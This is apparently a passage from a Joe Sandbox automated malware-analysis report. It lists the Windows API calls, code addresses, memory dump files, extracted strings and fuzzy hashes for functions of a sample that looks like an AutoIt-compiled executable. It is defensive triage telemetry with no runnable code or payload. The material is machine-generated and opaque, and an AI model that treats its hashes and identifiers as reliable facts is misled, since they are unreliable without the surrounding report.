                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706829360-0
                                                                                                                        • Opcode ID: f78837781c724d3311571bd177b58739b5141fd56103c3fa2ba48c2163280f6b
                                                                                                                        • Instruction ID: 37e2c3f7435c46172fc51312302aade4c614a7229adb185e99e19c10294bdb33
                                                                                                                        • Opcode Fuzzy Hash: f78837781c724d3311571bd177b58739b5141fd56103c3fa2ba48c2163280f6b
                                                                                                                        • Instruction Fuzzy Hash: DA418031904219AFCF10EFA4D8889ADBBB9FF08354F05806AF945AB351DB35A945EF90
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00FF5AA6
                                                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00FF5AEB
                                                                                                                        • gethostbyname.WSOCK32(?), ref: 00FF5AF7
                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00FF5B05
                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FF5B75
                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FF5B8B
                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00FF5C00
                                                                                                                        • WSACleanup.WSOCK32 ref: 00FF5C06
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                        • String ID: Ping
                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                        • Opcode ID: 8c092e9df3c2a0393f359212516a597726c26f65c7b5bbb3e83b01ace8050b1b
                                                                                                                        • Instruction ID: d55964285e1641b53ea9e2de65e339befc56355be7ff6481cb1e9cfeb771c6d0
                                                                                                                        • Opcode Fuzzy Hash: 8c092e9df3c2a0393f359212516a597726c26f65c7b5bbb3e83b01ace8050b1b
                                                                                                                        • Instruction Fuzzy Hash: 495183316047019FD721AF24DC49B7A77E4EF84B20F144529F796DB2A1DB78E800EB41
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00FEB73B
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FEB7B1
                                                                                                                        • GetLastError.KERNEL32 ref: 00FEB7BB
                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00FEB828
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                        • Opcode ID: 47935c4737337137a7d20738ce43dfbd528bb83ef363eb75cd2ef8435563b578
                                                                                                                        • Instruction ID: 482ef718a5f62b4b50e2b1ad4db9bb1d74e9fea234656d3a8b5992f941230321
                                                                                                                        • Opcode Fuzzy Hash: 47935c4737337137a7d20738ce43dfbd528bb83ef363eb75cd2ef8435563b578
                                                                                                                        • Instruction Fuzzy Hash: 2531B235A002459FDB10EF66CC85AFF77B8EF88710F144029E541DB291DB759A42EB51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 00FDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDB0E7
                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FD94F6
                                                                                                                        • GetDlgCtrlID.USER32 ref: 00FD9501
                                                                                                                        • GetParent.USER32 ref: 00FD951D
                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FD9520
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00FD9529
                                                                                                                        • GetParent.USER32(?), ref: 00FD9545
                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FD9548
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1536045017-1403004172
                                                                                                                        • Opcode ID: 1cf5f5fad1b357a9aad02a9a8bf5a447ef9851966c8b700697352daec7df0f4c
                                                                                                                        • Instruction ID: 57e79810cf6a37dc30aae49193af8f5be3ab35a5011ef6350e07d3fba676fb01
                                                                                                                        • Opcode Fuzzy Hash: 1cf5f5fad1b357a9aad02a9a8bf5a447ef9851966c8b700697352daec7df0f4c
                                                                                                                        • Instruction Fuzzy Hash: 0321E274900204ABCF15AFA1CC85EFEBBA9EF49310F14421AB56197292DB799919AB20
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 00FDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDB0E7
                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FD95DF
                                                                                                                        • GetDlgCtrlID.USER32 ref: 00FD95EA
                                                                                                                        • GetParent.USER32 ref: 00FD9606
                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FD9609
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00FD9612
                                                                                                                        • GetParent.USER32(?), ref: 00FD962E
                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FD9631
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1536045017-1403004172
                                                                                                                        • Opcode ID: d84c30783558be17cfa995d2a4a2bc8e1f8f15a2cd8c6c371fb8a899a2ea8308
                                                                                                                        • Instruction ID: 588ea5f85604dca77a93776a7ce38f3c3b47aa54d8d27293ab5f981c9223da00
                                                                                                                        • Opcode Fuzzy Hash: d84c30783558be17cfa995d2a4a2bc8e1f8f15a2cd8c6c371fb8a899a2ea8308
                                                                                                                        • Instruction Fuzzy Hash: AA21D374900204BBDF15AFB1CCC5EFEBBB9EF48300F14011AB95197295DBB99919AB20
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32 ref: 00FD9651
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00FD9666
                                                                                                                        • _wcscmp.LIBCMT ref: 00FD9678
                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FD96F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                        • Opcode ID: eee1cf7f9ed9bb6cdadd3c98a2d9eefbf1008c2b1143fec88df23179a8392a8b
                                                                                                                        • Instruction ID: fe28ad49f590d40098eb685a15ba6ae27edc8703d0550e7584bdcbe2a9786206
                                                                                                                        • Opcode Fuzzy Hash: eee1cf7f9ed9bb6cdadd3c98a2d9eefbf1008c2b1143fec88df23179a8392a8b
                                                                                                                        • Instruction Fuzzy Hash: ED11597764C307BAFA102661DC07DA6779D8B05374F20011BF900E51D1FEE6E9417B48
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00FF8BEC
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00FF8C19
                                                                                                                        • CoUninitialize.OLE32 ref: 00FF8C23
                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00FF8D23
                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FF8E50
                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01012C0C), ref: 00FF8E84
                                                                                                                        • CoGetObject.OLE32(?,00000000,01012C0C,?), ref: 00FF8EA7
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00FF8EBA
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FF8F3A
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00FF8F4A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2395222682-0
                                                                                                                        • Opcode ID: 98805fc9aacf19bf1098e4507dc44289cd3786700ae45e139dc3a6b89d114e52
                                                                                                                        • Instruction ID: 84456bde38fd71809b19f0ece75bc03c80d2af0770110f3a08d068c476d6d921
                                                                                                                        • Opcode Fuzzy Hash: 98805fc9aacf19bf1098e4507dc44289cd3786700ae45e139dc3a6b89d114e52
                                                                                                                        • Instruction Fuzzy Hash: FFC14571608309AFD700EF64C88496ABBE9FF88748F10491DF689DB261DB71ED06DB52
                                                                                                                        APIs
                                                                                                                        • __swprintf.LIBCMT ref: 00FE419D
                                                                                                                        • __swprintf.LIBCMT ref: 00FE41AA
                                                                                                                          • Part of subcall function 00FA38D8: __woutput_l.LIBCMT ref: 00FA3931
                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00FE41D4
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00FE41E0
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00FE41ED
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00FE420D
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00FE421F
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00FE422E
                                                                                                                        • LockResource.KERNEL32(?), ref: 00FE423A
                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00FE429B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1433390588-0
                                                                                                                        • Opcode ID: 73901d142e8b04eee0d67ff8f1c3176e4b03616d8687e5c62f5b0e91b0132657
                                                                                                                        • Instruction ID: dab60093e0935433e2a4fd600720bed85900275ca141d29f5c7a4158533f1982
                                                                                                                        • Opcode Fuzzy Hash: 73901d142e8b04eee0d67ff8f1c3176e4b03616d8687e5c62f5b0e91b0132657
                                                                                                                        • Instruction Fuzzy Hash: 8C31E3B1A0128AAFCB21DF61DC48EBF7BACEF08301F004429F941D6140D779EA11EBA0
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00FE1700
                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FE0778,?,00000001), ref: 00FE1714
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00FE171B
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0778,?,00000001), ref: 00FE172A
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FE173C
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0778,?,00000001), ref: 00FE1755
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0778,?,00000001), ref: 00FE1767
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FE0778,?,00000001), ref: 00FE17AC
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FE0778,?,00000001), ref: 00FE17C1
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FE0778,?,00000001), ref: 00FE17CC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2156557900-0
                                                                                                                        • Opcode ID: 3276f130a8c25349cd2689e0249c797582cb3e20496a816a1afbd021256b1851
                                                                                                                        • Instruction ID: a4fb2fd003d30575ca2347293589f42a9d769c104f8dd428e3e77b6fcf3355cf
                                                                                                                        • Opcode Fuzzy Hash: 3276f130a8c25349cd2689e0249c797582cb3e20496a816a1afbd021256b1851
                                                                                                                        • Instruction Fuzzy Hash: A431C3B9A00244BBDB32DF26DD84F7937E9FB19B61F104014F844C6285DB7A9D40EB51
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F8FC06
                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00F8FCA5
                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00F8FDFC
                                                                                                                        • DestroyWindow.USER32(?), ref: 00FC4A00
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00FC4A65
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FC4A92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                        • String ID: close all
                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                        • Opcode ID: 3595d6bbdbda19fc7e2ae271781939705879b2ba946b87ce40d7d30d1cf946e1
                                                                                                                        • Instruction ID: 6c3da9d23ca014efb4c832abb3e995732a7523ed2778dca7dbb9e5b01520cdac
                                                                                                                        • Opcode Fuzzy Hash: 3595d6bbdbda19fc7e2ae271781939705879b2ba946b87ce40d7d30d1cf946e1
                                                                                                                        • Instruction Fuzzy Hash: 98A19D71B012138FCB29EF10C9A5FA9F764AF05710F1442ADE90AAB251DB38ED16EF54
                                                                                                                        APIs
                                                                                                                        • EnumChildWindows.USER32(?,00FDAA64), ref: 00FDA9A2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                        • Opcode ID: dc5bc72ec148d694307b99c79b7db959a61c750e45d4b908c9393b14f5faf967
                                                                                                                        • Instruction ID: 5bec0f4ce04da2c02d4758bada48307798a9f308ee5a00fe8f60d6bcb18d8cab
                                                                                                                        • Opcode Fuzzy Hash: dc5bc72ec148d694307b99c79b7db959a61c750e45d4b908c9393b14f5faf967
                                                                                                                        • Instruction Fuzzy Hash: B991EB71900606DBDB08EF70C891BEDFB76BF04314F188116E899A7241DF34AA59FB96
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00F82EAE
                                                                                                                          • Part of subcall function 00F81DB3: GetClientRect.USER32(?,?), ref: 00F81DDC
                                                                                                                          • Part of subcall function 00F81DB3: GetWindowRect.USER32(?,?), ref: 00F81E1D
                                                                                                                          • Part of subcall function 00F81DB3: ScreenToClient.USER32(?,?), ref: 00F81E45
                                                                                                                        • GetDC.USER32 ref: 00FBCF82
                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FBCF95
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00FBCFA3
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00FBCFB8
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00FBCFC0
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FBD04B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                        • Opcode ID: 09fd0647643c95be30fe3763294d076fcf16838b540b80283cc47fe2042ba816
                                                                                                                        • Instruction ID: 3a1c0c929fca3524721d20dd5c1e1986d1c6622e453a872572ed7ecde984c274
                                                                                                                        • Opcode Fuzzy Hash: 09fd0647643c95be30fe3763294d076fcf16838b540b80283cc47fe2042ba816
                                                                                                                        • Instruction Fuzzy Hash: 6D71D171800205DFCF21EF65C880AFA3BB6FF49360F1442AAED955A199D7329841FF61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                          • Part of subcall function 00F82344: GetCursorPos.USER32(?), ref: 00F82357
                                                                                                                          • Part of subcall function 00F82344: ScreenToClient.USER32(010467B0,?), ref: 00F82374
                                                                                                                          • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000001), ref: 00F82399
                                                                                                                          • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0100C2E4
                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 0100C2EA
                                                                                                                        • ReleaseCapture.USER32 ref: 0100C2F0
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0100C39A
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0100C3AD
                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0100C48F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                        • Opcode ID: 2e576431823b8b64a741d9fa5af3cbe23ec701c8207a60052ce8fc3ef68268d8
                                                                                                                        • Instruction ID: 75b4a302e8f093f0369b8bed4e9acba2ba492afc39afa0e71bb55a544528945a
                                                                                                                        • Opcode Fuzzy Hash: 2e576431823b8b64a741d9fa5af3cbe23ec701c8207a60052ce8fc3ef68268d8
                                                                                                                        • Instruction Fuzzy Hash: 6551CFB4204301AFE715EF24C995FAA7BE0FB88310F00865DF5D18B2E1DB7AA944DB52
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0100F910), ref: 00FF903D
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0100F910), ref: 00FF9071
                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FF91EB
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00FF9215
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
